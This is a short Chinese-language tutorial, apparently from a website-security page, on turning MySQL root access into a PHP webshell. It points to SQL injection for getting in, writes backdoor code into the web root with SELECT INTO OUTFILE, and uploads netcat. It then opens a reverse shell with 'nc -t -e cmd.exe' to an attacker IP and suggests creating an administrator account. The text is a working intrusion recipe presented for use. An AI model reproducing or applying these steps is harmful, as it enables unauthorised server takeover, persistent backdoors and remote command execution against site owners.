在获得目标网站的mysql权限之后,可进一步获取网站webshell,此方法前提①mysql权限是root,②获取到了网站的绝对路径。 获取数据库权限的方法,可以尝试sql注入(方法参见: HdhCmsTest2cto测试数据/Article/201209/153277.html )。 获取了mysql的root权限后,在数据库中新建一个表,表内有一个字段,字段内填入php后门代码,如create table doortable ( backdoor varchar(1000) ); 然后 insert into doortable (backdoor) values ([hello world]);,实际内容改为php后门代码, 插入成功后,执行命令select * from doortable into outfile [c:\apache\htdocs\tem.php], (实际操作中填入目标网站的绝对路径)。 然后我们在自己的机器上去访问这个php文件,效果如图: 我们可以在webshell中执行命令,如执行tasklist,效果如图:
我们还可以上传自定义的文件到目标网站的路径,如上传一个nc程序,进一步建立一个反弹链接。选择 下载 文件中nc.exe,点击上传。 上传成功后,首先在我们本机上监听一个端口,命令:nc -vv -l -p 8080,然后通过我们的php后门文件在服务器端执行命令:nc -t -e C:\ windows \system32\cmd.exe 192.168.1.102 8080。稍后,应该就在我们本地监听的cmd中,建立了一个链接,出现目标主机的shell,如图: 然后就是net user新建管理员用户等等。。。
查看更多关于通过mysql获取php webshell - 网站安全 - 自学php的详细内容...